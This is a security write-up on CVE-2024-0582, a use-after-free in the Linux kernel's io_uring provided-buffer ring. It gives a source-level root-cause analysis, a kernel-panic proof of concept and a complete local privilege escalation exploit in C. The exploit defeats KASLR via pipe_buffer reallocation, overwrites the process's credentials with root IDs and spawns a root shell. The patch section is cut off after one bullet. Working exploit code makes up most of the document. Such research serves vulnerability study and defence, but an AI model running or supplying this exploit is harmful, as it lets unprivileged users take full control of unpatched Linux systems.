0x00. Before We Start

CVE-2024-0582 is a use-after-free vulnerability in the Linux kernel’s io_uring subsystem, caused by a missing check on whether a ring buffer’s memory is still in use. An unprivileged attacker can exploit it by registering a ring buffer whose memory is allocated by the kernel via IORING_REGISTER_PBUF_RING, mmap()-ing it into user space, and then freeing the ring buffer while the mapping is still alive. This security flaw allows an unprivileged local user to crash the system or to escalate their privileges.

The CVSS score of this vulnerability is 7.8, detailed as follows.

Score    Severity    Version    Vector String
7.8      High        3.1        CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

0x01. Analysis of the vulnerability

In this article, we will use version 6.5 of the Linux kernel source code for our detailed analysis.

The io_uring subsystem provides three new system calls (a minimal usage sketch follows the list):

  • io_uring_setup(): This system call creates a new io_uring context, which mainly consists of a submission queue (SQ) and a completion queue (CQ) with a specified number of entries. A file descriptor is returned to us for further operations.
  • io_uring_register(): This system call configures a specific io_uring instance. Available operations include registering new buffers, updating buffer contents, unregistering buffers, etc.
  • io_uring_enter(): This system call submits new I/O requests; the caller can choose whether to wait synchronously for the I/O to complete.
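
To make these calls concrete, here is a minimal sketch of driving them directly. This is an illustration of the call flow only: glibc ships no wrappers for these syscalls, so raw syscall(2) is used, and an x86-64 Linux with the io_uring UAPI headers installed is assumed.

#define _GNU_SOURCE
#include <linux/io_uring.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    struct io_uring_params params;
    int fd;

    memset(&params, 0, sizeof(params));

    /* io_uring_setup(): create an instance whose SQ/CQ hold 4 entries */
    fd = syscall(__NR_io_uring_setup, 4, &params);
    if (fd < 0)
        return 1;

    /*
     * The returned fd is what io_uring_register() and io_uring_enter()
     * (and, as we will see below, mmap()) operate on.
     */
    close(fd);
    return 0;
}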

For the io_uring_register() syscall, its prototype is as follows:

SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
                void __user *, arg, unsigned int, nr_args)

The core function of this system call, __io_uring_register(), contains a big switch statement that dispatches each opcode to its handler. We mainly focus on the case for IORING_REGISTER_PBUF_RING.
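
For reference, the dispatch for our opcode looks roughly like this in 6.5 (abridged from io_uring/io_uring.c; the surrounding cases and locking are omitted):

static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
                               void __user *arg, unsigned nr_args)
{
    int ret;

    /* ... */
    switch (opcode) {
    /* ... */
    case IORING_REGISTER_PBUF_RING:
        ret = -EINVAL;
        if (!arg || nr_args != 1)
            break;
        ret = io_register_pbuf_ring(ctx, arg);
        break;
    /* ... */
    }
    return ret;
}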

PBUF_RING Internals

The pbuf (i.e., provided buffer) is an io_uring feature that lets an application hand the kernel a pool of buffers in advance, from which the kernel picks one when completing a request.

I. Ring Registration: IORING_REGISTER_PBUF_RING

io_uring allows users to create a ring buffer with the opcode IORING_REGISTER_PBUF_RING through io_uring_register(), which finally calls into the function io_register_pbuf_ring():

int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
    struct io_uring_buf_reg reg;
    struct io_buffer_list *bl, *free_bl = NULL;
    int ret;

    if (copy_from_user(&reg, arg, sizeof(reg)))
        return -EFAULT;

    if (reg.resv[0] || reg.resv[1] || reg.resv[2])
        return -EINVAL;
    if (reg.flags & ~IOU_PBUF_RING_MMAP)
        return -EINVAL;
    if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
        if (!reg.ring_addr)
            return -EFAULT;
        if (reg.ring_addr & ~PAGE_MASK)
            return -EINVAL;
    } else {
        if (reg.ring_addr)
            return -EINVAL;
    }

    if (!is_power_of_2(reg.ring_entries))
        return -EINVAL;

    /* cannot disambiguate full vs empty due to head/tail size */
    if (reg.ring_entries >= 65536)
        return -EINVAL;

    if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
        int ret = io_init_bl_list(ctx);
        if (ret)
            return ret;
    }

    bl = io_buffer_get_list(ctx, reg.bgid);
    if (bl) {
        /* if mapped buffer ring OR classic exists, don't allow */
        if (bl->is_mapped || !list_empty(&bl->buf_list))
            return -EEXIST;
    } else {
        free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
        if (!bl)
            return -ENOMEM;
    }

    if (!(reg.flags & IOU_PBUF_RING_MMAP))
        ret = io_pin_pbuf_ring(&reg, bl);
    else
        ret = io_alloc_pbuf_ring(&reg, bl);

    if (!ret) {
        bl->nr_entries = reg.ring_entries;
        bl->mask = reg.ring_entries - 1;

        io_buffer_add_list(ctx, bl, reg.bgid);
        return 0;
    }

    kfree(free_bl);
    return ret;
}

Setting aside the parameter checks, its core logic is:

  • First it calls io_buffer_get_list() to obtain an existing io_buffer_list structure, or allocates a new one if none exists.
  • If the IOU_PBUF_RING_MMAP bit is set in the request flags, it calls io_alloc_pbuf_ring() to allocate contiguous pages; otherwise io_pin_pbuf_ring() is called to pin user-space pages into the ring.
  • After all that has been completed, the result is written into the io_buffer_list structure obtained before, which is saved into the current context.

As the vulnerability lies on the mmap()-related code path, we mainly focus on the path through io_alloc_pbuf_ring(), which ultimately calls __get_free_pages() to allocate pages.

static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
                              struct io_buffer_list *bl)
{
    gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
    size_t ring_size;
    void *ptr;

    ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
    ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
    if (!ptr)
        return -ENOMEM;

    bl->buf_ring = ptr;
    bl->is_mapped = 1;
    bl->is_mmap = 1;
    return 0;
}

The io_buffer_list structure is what ties all of these pieces together.
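
Its definition in 6.5 is roughly the following (abridged from io_uring/kbuf.h and quoted from memory, so the field order may differ slightly; the original comments are condensed):

struct io_buffer_list {
    /*
     * If ->buf_nr_pages is set, then buf_pages/buf_ring are used; otherwise
     * these are classic provided buffers and ->buf_list is used.
     */
    union {
        struct list_head buf_list;
        struct {
            struct page **buf_pages;
            struct io_uring_buf_ring *buf_ring;
        };
    };
    __u16 bgid;

    /* below is for ring provided buffers */
    __u16 buf_nr_pages;
    __u16 nr_entries;
    __u16 head;
    __u16 mask;

    /* ring mapped provided buffers */
    __u8 is_mapped;
    /* ring mapped provided buffers, but mmap'ed by application */
    __u8 is_mmap;
};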

II. Unregistration: IORING_UNREGISTER_PBUF_RING

Corresponding to registration, io_uring allows users to unregister a PBUF_RING with the opcode IORING_UNREGISTER_PBUF_RING, which is handled by io_unregister_pbuf_ring():

int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
    struct io_uring_buf_reg reg;
    struct io_buffer_list *bl;

    if (copy_from_user(&reg, arg, sizeof(reg)))
        return -EFAULT;
    if (reg.resv[0] || reg.resv[1] || reg.resv[2])
        return -EINVAL;
    if (reg.flags)
        return -EINVAL;

    bl = io_buffer_get_list(ctx, reg.bgid);
    if (!bl)
        return -ENOENT;
    if (!bl->is_mapped)
        return -EINVAL;

    __io_remove_buffers(ctx, bl, -1U);
    if (bl->bgid >= BGID_ARRAY) {
        xa_erase(&ctx->io_bl_xa, bl->bgid);
        kfree(bl);
    }
    return 0;
}

Its core logic is:

  • First it calls io_buffer_get_list() to look up the existing io_buffer_list structure; if none exists it returns.
  • Then it calls __io_remove_buffers() to release the pages recorded in the io_buffer_list structure.
  • Finally it calls xa_erase() to remove this io_buffer_list from the context, and frees it as well.

Before we look into __io_remove_buffers(), recall from io_alloc_pbuf_ring() that several members of the io_buffer_list were assigned specific values:

static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
                              struct io_buffer_list *bl)
{
    /* ... */
    bl->is_mapped = 1;
    bl->is_mmap = 1;
Hence __io_remove_buffers() will take the following path to release the pages we allocated before.

static int __io_remove_buffers(struct io_ring_ctx *ctx,
                               struct io_buffer_list *bl, unsigned nbufs)
{
    unsigned i = 0;

    /* shouldn't happen */
    if (!nbufs)
        return 0;

    if (bl->is_mapped) {
        i = bl->buf_ring->tail - bl->head;
        if (bl->is_mmap) {
            struct page *page;

            page = virt_to_head_page(bl->buf_ring);
            if (put_page_testzero(page))
                free_compound_page(page);
            bl->buf_ring = NULL;
            bl->is_mmap = 0;
        } /* ... */
    }

In newer versions of this function, the put_page_testzero()/free_compound_page() pair is replaced by folio_put(virt_to_folio(bl->buf_ring));, but the core logic stays the same.

III. Usage: io_uring_mmap

How can we access the pages of a PBUF_RING? An easy way is to call mmap() on the io_uring fd, which ends up in the function io_uring_mmap().

static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
    size_t sz = vma->vm_end - vma->vm_start;
    unsigned long pfn;
    void *ptr;

    ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
    if (IS_ERR(ptr))
        return PTR_ERR(ptr);

    pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
    return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

/* ... */

static const struct file_operations io_uring_fops = {
    .release = io_uring_release,
    .mmap = io_uring_mmap,
The function io_uring_validate_mmap_request() first determines the requested object from the offset parameter of the mmap() syscall. This value is therefore not a regular file offset: its higher bits encode the type of the mapping and its lower bits carry a value (for the PBUF_RING case, the buffer group ID). We mainly focus on the path related to the PBUF_RING.
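
For reference, the offset encoding is defined by these UAPI constants (from include/uapi/linux/io_uring.h in 6.5):

#define IORING_OFF_SQ_RING          0ULL
#define IORING_OFF_CQ_RING          0x8000000ULL
#define IORING_OFF_SQES             0x10000000ULL
#define IORING_OFF_PBUF_RING        0x80000000ULL
#define IORING_OFF_PBUF_SHIFT       16
#define IORING_OFF_MMAP_MASK        0xf8000000ULL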

static void *io_uring_validate_mmap_request(struct file *file,
                                            loff_t pgoff, size_t sz)
{
    struct io_ring_ctx *ctx = file->private_data;
    loff_t offset = pgoff << PAGE_SHIFT;
    struct page *page;
    void *ptr;

    /* Don't allow mmap if the ring was setup without it */
    if (ctx->flags & IORING_SETUP_NO_MMAP)
        return ERR_PTR(-EINVAL);

    switch (offset & IORING_OFF_MMAP_MASK) {
    case IORING_OFF_SQ_RING:
    case IORING_OFF_CQ_RING:
        ptr = ctx->rings;
        break;
    case IORING_OFF_SQES:
        ptr = ctx->sq_sqes;
        break;
    case IORING_OFF_PBUF_RING: {
        unsigned int bgid;

        bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
        mutex_lock(&ctx->uring_lock);
        ptr = io_pbuf_get_address(ctx, bgid);
        mutex_unlock(&ctx->uring_lock);
        if (!ptr)
            return ERR_PTR(-EINVAL);
        break;
    }
    default:
        return ERR_PTR(-EINVAL);
    }

    page = virt_to_head_page(ptr);
    if (sz > page_size(page))
        return ERR_PTR(-EINVAL);

    return ptr;
}

The logic of io_pbuf_get_address() is much simpler: it just returns the buf_ring we allocated before.

void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
    struct io_buffer_list *bl;

    bl = io_buffer_get_list(ctx, bgid);
    if (!bl || !bl->is_mmap)
        return NULL;

    return bl->buf_ring;
}

Root Cause

From the code analysis above, it is clear that the PBUF_RING release path performs no check against existing mmap() mappings: the pages are freed while they may still be accessed through the memory-mapped region, yielding a page-level use-after-free. A minimal trigger sequence is sketched below.
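
The following sketch condenses the bug into its minimal trigger sequence. It uses the liburing helpers (liburing >= 2.4 is assumed for the buf-ring API) and omits all error handling:

#define _GNU_SOURCE
#include <liburing.h>
#include <sys/mman.h>

int main(void)
{
    struct io_uring ring;
    struct io_uring_buf_reg reg = {
        .ring_entries = 1,              /* must be a power of two */
        .bgid = 0,
        .flags = IOU_PBUF_RING_MMAP,    /* let the kernel allocate the pages */
    };

    io_uring_queue_init(4, &ring, 0);
    io_uring_register_buf_ring(&ring, &reg, 0);

    /* bgid 0 shifted by IORING_OFF_PBUF_SHIFT is 0, so only the type bits remain */
    volatile char *p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED,
                            ring.ring_fd, IORING_OFF_PBUF_RING);

    io_uring_unregister_buf_ring(&ring, 0); /* frees the pages ... */
    p[0] = 0x41;                            /* ... which we can still touch: UAF */
    return 0;
}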

Proof Of Concept

The following code is a proof of concept written by me. It simply uses the UAF to overwrite a seq_file's seq_operations and cause a kernel panic. Note that you will need to compile it against the liburing library.

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 **/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(INFO_MSG("[*] Process bound to core: ") "%d\n", core);
}

struct io_uring_buf_ring *
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
                     int bgid, unsigned int flags, int *retp)
{
    struct io_uring_buf_ring *buf_ring;
    struct io_uring_buf_reg buf_reg;
    size_t ring_size;
    off_t offset;
    int ret;

    memset(&buf_reg, 0, sizeof(buf_reg));

    /* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
    buf_reg.ring_entries = ring_entries;
    buf_reg.bgid = bgid;
    buf_reg.flags = IOU_PBUF_RING_MMAP;

    ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
    if (ret) {
        puts(ERR_MSG("[x] Error occurred while doing io_uring_register_buf_ring"));
        *retp = ret;
        return NULL;
    }

    /**
    [chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
    **/
    offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
    ring_size = ring_entries * sizeof(struct io_uring_buf);
    buf_ring = mmap(
        NULL,
        ring_size,
        PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
        ring->ring_fd,
        offset
    );

    if (IS_ERR(buf_ring)) {
        puts(ERR_MSG("[x] Error occurred while doing mmap() for io_uring"));
        *retp = PTR_ERR(buf_ring);
        return NULL;
    }

    *retp = 0;
    return buf_ring;
}

#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200

void proof_of_concept(void)
{
    struct io_uring ring;
    void **buffers;
    int seq_fd[SEQ_FILE_NR], found = 0;
    int ret;

    puts(SUCCESS_MSG("-------- CVE-2024-0582 Proof-of-concept --------"));
    puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
    puts(SUCCESS_MSG("-----------------------------------------------\n"));

    puts("[*] Preparing...");

    bind_core(0);

    if (io_uring_queue_init(4, &ring, 0) < 0) {
        perror(ERR_MSG("[x] Unable to init for io_uring queue"));
        exit(EXIT_FAILURE);
    }

    puts("[*] Allocating pbuf ring and doing mmap()...");

    buffers = calloc(NR_BUFFERS, sizeof(void*));
    for (int i = 0; i < NR_BUFFERS; i++) {
        buffers[i] = setup_pbuf_ring_mmap(
            &ring,
            NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
            i,
            0,
            &ret
        );
        if (ret) {
            printf(
                ERR_MSG("[x] Unable to set up") " No.%d "
                ERR_MSG("pbuf ring, error code: ") "%d\n",
                i,
                ret
            );
            exit(EXIT_FAILURE);
        }

        io_uring_buf_ring_init(buffers[i]);
    }

    puts("[*] Triggering page-level UAF vulnerabilities...");

    for (int i = 0; i < NR_BUFFERS; i++) {
        ret = io_uring_unregister_buf_ring(&ring, i);
        if (ret) {
            printf(
                ERR_MSG("[x] Unable to unregister") " No.%d "
                ERR_MSG("pbuf ring, error code: ") "%d\n",
                i,
                ret
            );
            exit(EXIT_FAILURE);
        }
    }

    puts("[*] Reallocating page into seq_file::seq_operations...");

    for (int i = 0; i < SEQ_FILE_NR; i++) {
        if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
            printf(
                ERR_MSG("[x] Unable to open") " No.%d "
                ERR_MSG("seq file, error code: ") "%d\n",
                i,
                seq_fd[i]
            );
            exit(EXIT_FAILURE);
        }
    }

    puts("[*] Checking data leak and overwriting...");

    for (int i = 0; i < NR_BUFFERS; i++) {
        uint64_t *buffer = buffers[i];
        for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
            if (buffer[j] > 0xffffffff80000000
                && buffer[j] < 0xfffffffff0000000) {
                printf(
                    SUCCESS_MSG("[+] Got kernel data leak:") " %lx "
                    SUCCESS_MSG("at location ") "%d-%d\n",
                    buffer[j],
                    i,
                    j
                );
                buffer[j] = *(uint64_t*) "arttnba3";
                found = 1;
                goto out;
            }
        }
    }

    if (!found) {
        puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
        exit(EXIT_FAILURE);
    }

out:
    puts("[*] Triggering kernel panic...");

    sleep(1);

    for (int i = 0; i < SEQ_FILE_NR; i++) {
        char buf[0x1000];
        read(seq_fd[i], buf, 1);
    }

    puts("[?] So you're still alive here!?");
    system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
    proof_of_concept();
    return 0;
}

0x02. Exploitation

The vulnerability gives us the capability to read and write the freed memory with almost no restrictions, so it can easily be exploited with many different techniques.

The following exploitation program, written by me, reallocates the UAF pages as pipe_buffer objects, granting the attacker arbitrary kernel memory read & write by overwriting pipe_buffer::page. The exploit uses these capabilities to overwrite the cred of the current process and complete a local privilege escalation.

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 **/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/prctl.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
uint64_t kernel_base, vmemmap_base, page_offset_base;

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(INFO_MSG("[*] Process bound to core: ") "%d\n", core);
}

void err_exit(const char *fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    vprintf(fmt, args);
    va_end(args);

    fflush(stdout);
    fflush(stderr);

    sleep(5);

    exit(EXIT_FAILURE);
}

void get_root_shell(void)
{
    if (getuid()) {
        puts(ERR_MSG("[x] Failed to get the root!"));
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts(SUCCESS_MSG("[+] Successfully got the root."));
    puts(INFO_MSG("[*] Execve root shell now..."));

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

struct io_uring_buf_ring *
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
                     int bgid, unsigned int flags, int *retp)
{
    struct io_uring_buf_ring *buf_ring;
    struct io_uring_buf_reg buf_reg;
    size_t ring_size;
    off_t offset;
    int ret;

    memset(&buf_reg, 0, sizeof(buf_reg));

    /* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
    buf_reg.ring_entries = ring_entries;
    buf_reg.bgid = bgid;
    buf_reg.flags = IOU_PBUF_RING_MMAP;

    ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
    if (ret) {
        puts(ERR_MSG("[x] Error occurred while doing io_uring_register_buf_ring"));
        *retp = ret;
        return NULL;
    }

    /**
    [chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
    **/
    offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
    ring_size = ring_entries * sizeof(struct io_uring_buf);
    buf_ring = mmap(
        NULL,
        ring_size,
        PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
        ring->ring_fd,
        offset
    );

    if (IS_ERR(buf_ring)) {
        puts(ERR_MSG("[x] Error occurred while doing mmap() for io_uring"));
        *retp = PTR_ERR(buf_ring);
        return NULL;
    }

    *retp = 0;
    return buf_ring;
}

/**
 * In my test environment, kmalloc-1k allocates from a 4-page slub, so I chose 4.
 * However, it might not be the same in your environment; e.g., it's 8 on my PC.
 * Check your /proc/slabinfo before doing the exploitation.
 */
#define NR_PAGES 4
#define NR_BUFFERS 0x200
#define SEQ_FILE_NR 0x200
#define PIPE_SPRAY_NR 0x1F0

struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct cred {
    long usage;
    uint32_t uid;
    uint32_t gid;
    uint32_t suid;
    uint32_t sgid;
    uint32_t euid;
    uint32_t egid;
    uint32_t fsuid;
    uint32_t fsgid;
};

void read_kernel_page_by_pipe(struct page *page,
                              struct pipe_buffer *kern_pipe_buf,
                              int pipe_fd[2], void *buf, size_t len)
{
    kern_pipe_buf->page = page;
    kern_pipe_buf->offset = 0;
    kern_pipe_buf->len = 0xffe;

    if (read(pipe_fd[0], buf, len) != len) {
        perror(ERR_MSG("[x] Unable to do reading on pipe"));
        exit(EXIT_FAILURE);
    }
}

void write_kernel_page_by_pipe(struct page *page,
                               struct pipe_buffer *kern_pipe_buf,
                               int pipe_fd[2], void *buf, size_t len)
{
    kern_pipe_buf->page = page;
    kern_pipe_buf->offset = 0;
    kern_pipe_buf->len = 0;

    if (write(pipe_fd[1], buf, len) != len) {
        perror(ERR_MSG("[x] Unable to do writing on pipe"));
        exit(EXIT_FAILURE);
    }
}

void exploit(void)
{
    struct io_uring ring;
    void **buffers;
    struct pipe_buffer *kern_pipe_buffer = NULL;
    uint64_t kernel_leak;
    int pipe_fd[PIPE_SPRAY_NR][2], victim_idx = -1;
    uint32_t uid, gid;
    uint64_t cred_kaddr, cred_kpage_addr;
    struct cred *cred_data;
    char buf[0x1000];
    int ret;

    puts(SUCCESS_MSG("-------- CVE-2024-0582 Exploitation --------") "\n"
         INFO_MSG("-------- Author: ") "arttnba3" INFO_MSG(" --------") "\n"
         SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));

    bind_core(0);

    puts("[*] Initializing io_uring ...");

    if (io_uring_queue_init(4, &ring, 0) < 0) {
        perror(ERR_MSG("[x] Unable to init for io_uring queue"));
        exit(EXIT_FAILURE);
    }

    puts("[*] Allocating pbuf ring and doing mmap() ...");

    buffers = calloc(NR_BUFFERS, sizeof(void*));
    for (int i = 0; i < NR_BUFFERS; i++) {
        buffers[i] = setup_pbuf_ring_mmap(
            &ring,
            NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
            i,
            0,
            &ret
        );
        if (ret) {
            printf(
                ERR_MSG("[x] Unable to set up") " No.%d "
                ERR_MSG("pbuf ring, error code: ") "%d\n",
                i,
                ret
            );
            exit(EXIT_FAILURE);
        }

        io_uring_buf_ring_init(buffers[i]);
    }

    puts("[*] Triggering page-level UAF vulnerabilities ...");

    for (int i = 0; i < NR_BUFFERS; i += 2) { /* we need "holes" */
        ret = io_uring_unregister_buf_ring(&ring, i);
        if (ret) {
            printf(
                ERR_MSG("[x] Unable to unregister") " No.%d "
                ERR_MSG("pbuf ring, error code: ") "%d\n",
                i,
                ret
            );
            exit(EXIT_FAILURE);
        }
    }

    puts("[*] Reallocating pages as pipe_buffers ...");

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if ((ret = pipe(pipe_fd[i])) < 0) {
            printf(
                ERR_MSG("[x] Unable to set up") " No.%d "
                ERR_MSG("pipe, error code: ") "%d\n",
                i,
                ret
            );
            exit(EXIT_FAILURE);
        }
    }

    puts("[*] Allocating pipe_buffer::page ...");

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        write(pipe_fd[i][1], "arttnba3", 8);
        write(pipe_fd[i][1], "arttnba3", 8);
        write(pipe_fd[i][1], "arttnba3", 8);
        write(pipe_fd[i][1], "arttnba3", 8);
    }

    puts("[*] Checking for UAF mmap address ...");

    for (int i = 0; i < NR_BUFFERS; i += 2) {
        uint64_t *buffer = buffers[i];
        for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
            if (buffer[j] > 0xffff000000000000
                && buffer[j + 1] == 0x2000000000
                && buffer[j + 2] > 0xffffffff81000000) {
                printf(
                    SUCCESS_MSG("[+] Got kernel pipe_buffer mapped at buffer:")
                    " %d-%d\n", i, j
                );
                printf(
                    INFO_MSG("[*] Leak pipe_buffer::page = ") "%lx\n", buffer[j]
                );
                printf(
                    INFO_MSG("[*] Leak pipe_buffer::ops = ") "%lx\n", buffer[j+2]
                );
                kern_pipe_buffer = (void*) &buffer[j];
                goto out_find_pipe;
            }
        }
    }

    if (!kern_pipe_buffer) {
        puts(ERR_MSG("[x] Failed to find kernel pipe_buffer in user space!"));
        exit(EXIT_FAILURE);
    }

out_find_pipe:

    puts("[*] Overwriting victim pipe_buffer::page ...");
    /* note that the granularity of KASLR is 256MB, i.e. 0x10000000 */
    vmemmap_base = (uint64_t) kern_pipe_buffer->page & KASLR_MASK;
    kern_pipe_buffer->page = (void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40);

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        read(pipe_fd[i][0], &kernel_leak, sizeof(kernel_leak));
        if (kernel_leak != *(uint64_t*) "arttnba3") {
            printf(SUCCESS_MSG("[+] Got victim pipe at idx: ") "%d\n", i);
            victim_idx = i;
            break;
        }
    }

    if (victim_idx == -1) {
        puts(ERR_MSG("[x] Failed to find the victim pipe!"));
        exit(EXIT_FAILURE);
    }

    for (uint64_t loop_nr = 0; 1; loop_nr++) {
        if (kernel_leak > 0xffffffff81000000
            && (kernel_leak & 0xfff) < 0x100) {
            kernel_base = kernel_leak & 0xfffffffffffff000;
            if (loop_nr != 0) {
                puts("");
            }
            printf(
                INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n", kernel_leak
            );
            printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
            printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
            break;
        }

        for (int i = 0; i < 80; i++) {
            putchar('\b');
        }
        printf(
            "[No.%ld loop] Got unmatched data: %lx, keep looping...",
            loop_nr,
            kernel_leak
        );

        vmemmap_base -= KASLR_GRANULARITY;
        read_kernel_page_by_pipe(
            (void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40),
            kern_pipe_buffer,
            pipe_fd[victim_idx],
            &kernel_leak,
            sizeof(kernel_leak)
        );
    }

    puts("[*] Finding task_struct of current process in kernel space ...");

    prctl(PR_SET_NAME, "rat3bant");
    uid = getuid();
    gid = getgid();

    for (int i = 0; 1; i++) {
        uint64_t *comm_addr;

        read_kernel_page_by_pipe(
            (void*) (vmemmap_base + 0x40 * i),
            kern_pipe_buffer,
            pipe_fd[victim_idx],
            buf,
            0xff8
        );

        comm_addr = memmem(buf, 0xff0, "rat3bant", 8);

        if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
            && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
            && (comm_addr[-2] == comm_addr[-3])) { /* should be equal */

            printf(
                SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
                (vmemmap_base + i * 0x40)
            );
            printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n", comm_addr[-2]);

            cred_kaddr = comm_addr[-2];
            cred_data = (void*) (buf + (cred_kaddr & (PAGE_SIZE - 1)));
            page_offset_base = cred_kaddr & KASLR_MASK;

            while (1) {
                cred_kpage_addr = vmemmap_base
                    + (cred_kaddr - page_offset_base) / 0x1000 * 0x40;

                read_kernel_page_by_pipe(
                    (void*) cred_kpage_addr,
                    kern_pipe_buffer,
                    pipe_fd[victim_idx],
                    buf,
                    0xffe
                );
                if (cred_data->uid == uid
                    && cred_data->gid == gid) {
                    printf(
                        SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
                        cred_kpage_addr
                    );
                    break;
                }

                page_offset_base -= KASLR_GRANULARITY;
            }

            break;
        }
    }

    puts("[*] Overwriting cred and granting root privilege...");

    cred_data->uid = 0;
    cred_data->gid = 0;

    write_kernel_page_by_pipe(
        (void*) cred_kpage_addr,
        kern_pipe_buffer,
        pipe_fd[victim_idx],
        buf,
        0xff0
    );

    setresuid(0, 0, 0);
    setresgid(0, 0, 0);

    get_root_shell();
}

int main(int argc, char **argv, char **envp)
{
    exploit();
    return 0;
}

0x03. Patch

This vulnerability was fixed by commit c392cbecd8eca4c53f2bf508731257d9d0a21c2d, which makes the following changes (a sketch follows the list):

  • Adds a linked list to the io_uring context to record the buffers whose release must be delayed.
